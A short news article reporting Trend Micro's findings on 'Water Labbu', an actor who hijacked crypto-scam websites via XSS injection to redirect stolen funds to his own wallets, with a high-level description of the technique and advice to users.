Crypto fraudsters are fighting each other for the stolen funds

Cybersecurity researchers have discovered a hacker who broke into cryptocurrency scam sites and already stolen (opens in a new tab) funds into their own wallets, and thus have already earned hundreds of thousands of dollars.

According to Trend Micro, a threat actor named “Water Labbu” found and hacked 45 fraudulent websites and replaced their wallet addresses with his own. So any funds that the scammers trick people into giving will actually go to him.

Scam sites are basically fake liquidity mining pools. True liquidity mining pools work when people lend their cryptocurrencies to a decentralized exchange to create a liquidity pool. This liquidity pool allows cryptocurrency traders to trade their tokens directly (in a decentralized way, as opposed to a centralized way where one entity provides the liquidity). Lenders make a profit by receiving a portion of the trading fees.

Fake sites, fake programs

To lend their cryptocurrencies, users need to connect their wallets to a liquidity mining pool. Fake sites, on the other hand, are just waiting for people to tie up their wallets and then drain them. Between creating fake apps and taking to social media to promote the scam, there’s a lot of work to be done. Water Labbu bypasses all of this by letting the original scammers do all the hard work for them.

Trend Micro says the scammer has so far taken more than $300,000 from nine identified victims.

“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the ‘onerror’ event in a so-called XSS evasion technique to bypass cross-site scripting (XSS) filters. “, Trend Micro explained in its report. “Then the injected payload creates another script element that loads another script from the tmpmeta delivery server[.]com.”

The script looks for new wallets containing at least 0.005 ETH or 22,000 USDT and, depending on the platform (either Windows or one of the two mobile platforms), initiates the transfer.

To protect against such scams, Trend Micro warns, users should be very careful when connecting their wallets and make sure they do their due diligence before handing over their tokens.

Via: BleepingComputer (opens in a new tab)

Exit mobile version